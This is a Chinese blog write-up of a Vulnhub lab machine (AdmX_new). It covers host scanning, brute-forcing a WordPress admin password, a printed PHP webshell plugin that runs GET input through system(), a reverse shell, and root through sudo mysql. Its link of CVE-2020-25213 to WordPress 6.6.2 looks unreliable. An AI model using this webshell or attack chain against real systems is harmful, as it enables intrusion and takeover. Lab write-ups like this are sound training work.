Vulnhub打靶-admx-new

最新推荐文章于 2024-10-16 16:22:54 发布
最新推荐文章于 2024-10-16 16:22:54 发布
阅读量1.2k 收藏 25
点赞数 16
CC 4.0 BY-SA版权
文章标签: 实战打靶 网络安全 红蓝对抗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jnszstmei/article/details/142962688

基本信息

靶机下载:https://pan.baidu.com/s/1n__Xi5zpDxtNvuR_Be-2Dg?pwd=76wa 提取码: 76wa

攻击机器:192.168.20.128(Windows操作系统)

靶机:192.168.20.0/24

目标:获取2个flag+root权限

本次靶机难度较为简单,不涉及内网穿透等内容,是我第一次尝试红队攻击,故在此记录

具体流程

信息收集

首先我们拿到一个靶机,第一个要做的事情就是进行信息收集,看看靶机是否开放了某些具有漏洞的服务可以让我们进行渗透,由于靶机是部署在我虚拟机下的,所以我可以通过我的攻击机器知道靶机的网段是192.168.20.0/24,所以我们首先使用nmap扫描网段下存活的所有主机

执行命令nmap -sn 192.168.20.0/24

image-20241015140918503

192.168.20.1是我自己主机的IP地址,192.168.20.2是网关出口,192.168.20.128是我的攻击主机,所以这里存疑的只有192.168.20.132以及192.168.20.254,所以我们直接扫描这两个IP地址开放的端口来进行进一步确认

执行命令nmap 192.168.20.132 192.168.20.254

34d4c7430684f506686fb27ca4180e4e

我们可以进一步确定我们靶机的IP是192.168.20.132,且开放了80端口作为web服务,我们接着利用浏览器访问其80端口,看看能不能发现什么

image-20241015141853169

这一看就是要进行路径扫描,我们直接使用diresearch进行路径扫描,执行命令python dirsearch.py -u http://192.168.20.132/,如下所示

image-20241015142508268

我们发现有wordpress的登录后台,我们尝试访问即可,访问界面如下所示

image-20241015142651027

一开始我以为是我虚拟机的浏览器禁用了js,后来换成我主机的浏览器进行访问,发现还是这个样子,我接下来查看我浏览器配置的插件发现了关键信息,如下图所示

image-20241015142940386

我的findsomething插件显示的当前页面的IP地址为192.168.159.145,这显然和web页面的真实IP地址不一样,所以这里肯定是进行了IP替换,我们要通过bp进行代理,来重新更换回来,如下所示

43a9b48e13fffd4e50fb14edb7690eb3

我们在BP中进行如下设置之后,把浏览器的代理切换为BP进行代理,然后我们再尝试访问,如下所示

image-20241015143459459

我们可以发现页面访问正常,说明我们成功绕过了第一个限制

后台密码爆破

渗透思路很清晰,我们能够成功访问到后台登录界面,现在唯一要做的就是爆破出登录的账号密码进行登录即可,这个时候就要体现出字典的强大性了,由于刚刚后台路径扫描的过程中出现了 /tools/adminer.php,所以我们不妨猜测账号为admin,爆破页面如下所示

image-20241015145142744

35afb990a93fe7c2acb4dc02bc3ce881

我们发现这里有唯一一个状态码是重定向的,所以这个密码应该是正确的,所以密码为adam14,我们尝试登录,发现可以登录上去

image-20241015144824442

漏洞利用

首先我们可以看到wordpress的版本号,wordpress的版本号为6.6.2,我们尝试搜索其历史漏洞。看看是否爆出过历史漏洞,我们发现存在CVE-2020-25213远程代码执行的漏洞,所以我们尝试上传PHP脚本以进行任意命令执行,其中我们的后门代码如下所示

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:https//borgeous.github.io

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:borgeous

 * Author URI:https://borgeous.github.io

 * License:https://borgeosus.github.io

 */

if(isset($_GET['pass']))

    {

	    system($_GET['pass']);

    }

?>

这里要注意的是,一定不能缺少上面的说明部分,这是wordpress插件的固定格式,且要压缩成zip文件包进行上传

image-20241015151347533

我们在激活插件后尝试访问如下地址

http://192.168.20.132/wordpress/wp-content/plugins/shell.php?pass=whoami

image-20241015152021795

我们发现可以成功执行任意命令

反弹shell

既然可以成功执行任意命令,那么接下来就是进行反弹shell拿主机命令执行权限

首先我们运行主机的nc进行监听9001端口

image-20241015152424490

紧接着我们用fantanshell生成器进行生成fantanshell,因为绝大部分靶机都有python环境,所以我们尝试使用python来进行反弹shell,如下所示

image-20241015152814279

我们将该命令进行执行,如下所示

image-20241015152907881

我们发现靶机已经成功上线,成功获取权限,我们此时切换到家目录,我们发现存在wpadmin用户,我们进入wpadmin用户,可以发现存在local.txt文件,我们尝试读取,但是发现权限不够,所以我们尝试切换wpadmin用户,密码试着使用adam14,发现成功进去,并成功获取第一个flag值

image-20241015154723460

image-20241015154927110

flag{Ava}

mysql提权

我们首先执行sudo -l命令列出当前用户在使用sudo命令时可以执行的命令列表

image-20241015160046825

我们发现用户wpadmin可以无需输入密码(NOPASSWD)以root用户的权限执行/usr/bin/mysql命令,连接到名为wordpress的数据库,我们尝试执行即可

image-20241015160253986

需要数据库密码,我们尝试密码复用,因为在真实环境中,会出现很多密码复用的情况,所以我们依然尝试adam14

image-20241015161935661

我们可以发现成功进入,然后我们利用mysqlsystem命令来帮助我们直接以root身份执行系统命令(\ !mysql命令中system的简写)。然后我们直接利用 \!来使用 /bin/bash命令以 root的身份来使用 shell

image-20241015162510800

成功获得root权限,且获得第二个flag

image-20241015162619737

image-20241015162715907

flag{Adam}

至此全部解决,我们可以尝试爆破root的密码,因为我们已经拿到了root权限,所以可以访问shadow文件,我们尝试使用john进行爆破

image-20241015163928669

发现密码本中没有该root密码,我们尝试修改root密码以维持权限

image-20241015164026156

成功拿到主机权限

image-20241015164057959

borgeous
关注
AdmX_new打靶记录
wwd180的博客
06-16 213
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
VnlnHub admx
weixin_45682839的博客
09-02 437
VnlnHub admx靶场通关记录攻略,涉及知识包括:端口服务探测、铭感目录扫描、burp页面内容批量替换、后台密码爆破、wordpress后台getshell、nc串联,python反弹shell、升级反弹的不完整shell、linux本地提权
Vulnhub--AdmX_new
weixin_45168704的博客
06-15 351
AdmX_new攻略
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1561
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 370
BP自动替换、另类提权方法
vulnhub靶机--AdmX_new
weixin_46107179的博客
04-08 4041
靶机下载地址:靶机下载 主机发现 通过nmap扫描得到主机IP地址 信息搜集 通过nmap对IP地址扫描,得到信息,只有80端口 然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url 于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip 需要通过burpsuite里面的proxy模块的options功能,将其响应头
Vulnhub-AdmX
qq_52579508的博客
06-28 973
靶机 :131 这台主机 存活。
Vulnhub打靶-matrix-breakout-2-morpheus
jnszstmei的博客
10-16 658
攻击机器:192.168.20.128(Windows操作系统)靶机:192.168.20.0/24目标:获取2个flag+root权限。
kali之vulnhubAdmx_new
weixin_54431413的博客
05-11 830
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
Admx_new
果粒程
11-22 491
Admx_new
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2589
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8743
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
最新版仿OPPO手机计算器安卓版
08-05
资源下载链接为: https://pan.quark.cn/s/f989b9092fc5 在 Android 应用开发中,开发一款仿 OPPO 手机计算器的应用是极具实践价值的任务,它融合了 UI 设计、事件处理以及数学逻辑等多方面的技术要点。当前的“最新版仿 OPPO 手机计算器--android.rar”压缩包中,提供了该计算器应用的源代码,这为开发者深入学习 Android 编程提供了宝贵的资源。 UI 设计是构建此类计算器应用的基石。OPPO 手机的计算器界面以清晰的布局和良好的用户交互体验著称,其中包括数字键、运算符键以及用于显示结果的区域等关键元素。开发者需借助 Android Studio 中的 XML 布局文件来定义这些界面元素,可选用 LinearLayout、GridLayout 或 ConstraintLayout 等布局管理器,并搭配 Button 控件来实现各个按键功能。同时,还需考虑不同分辨率屏幕和设备尺寸的适配问题,这通常涉及 Density Independent Pixel(dp)单位的应用以及 Android 尺寸资源的合理配置。 事件处理构成了计算器的核心功能。开发者要在每个按钮的点击事件中编写相应的处理代码,通常通过实现 OnClickListener 接口来完成。例如,当用户点击数字键时,相应的值会被添加到显示区域;点击运算符键时,则会保存当前操作数并设定运算类型。而对于等号(=)按钮,需要执行计算操作,这往往需要借助栈数据结构来存储操作数和运算符,并运用算法解析表达式以完成计算。 数学逻辑的实现则是计算器功能的关键体现。在 Android 应用中,开发者可以利用 Java 内置的 Math 类,或者自行设计算法来完成计算任务。基本的加减乘除运算可通过简单的算术操作实现,而像求幂、开方等复杂运算则需调用 Math 类的相关方法。此外
JanisZhang_PythonNotes_54428_1754231690770.zip
08-05
JanisZhang_PythonNotes_54428_1754231690770.zip
图神经网络的一个参考历程,供学习者使用
08-05
图神经网络的一个参考历程,供学习者使用
基于图像处理的安检违禁物品识别
08-05
资源下载链接为: https://pan.quark.cn/s/5efbf764ee8c 基于图像处理的安检违禁物品识别(最新、最全版本!打开链接下载即可用!)
PCLSharp 1.8.1.20180820 Beta 07 点云库组件
最新发布
08-05
资源下载链接为: https://pan.quark.cn/s/1bfadf00ae14 在C#项目中,可以使用PclSharp_Justin Bruening这一点云库来处理点云数据。通过在C#工程里进行相应的配置,就能顺利地将PCL库整合进来,进而借助它对点云开展各种处理操作。
zsh114514_learning_log_54428_1754232840682.zip
08-05
zsh114514_learning_log_54428_1754232840682.zip
Mysql 远程登录1045失败解决办法
08-05
Mysql 远程登录1045失败解决办法
Office 2010-365 ADMX/ADML模板部署指南
资源摘要信息:"Office 2010-365 ADMX/ADML 是一组模板文件,专门为 Microsoft Office 的多个版本设计,包括2010、2013、2016、2019、2021 和 Office 365。这些模板文件允许 IT 管理员使用组策略对象(GPO)进行集中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值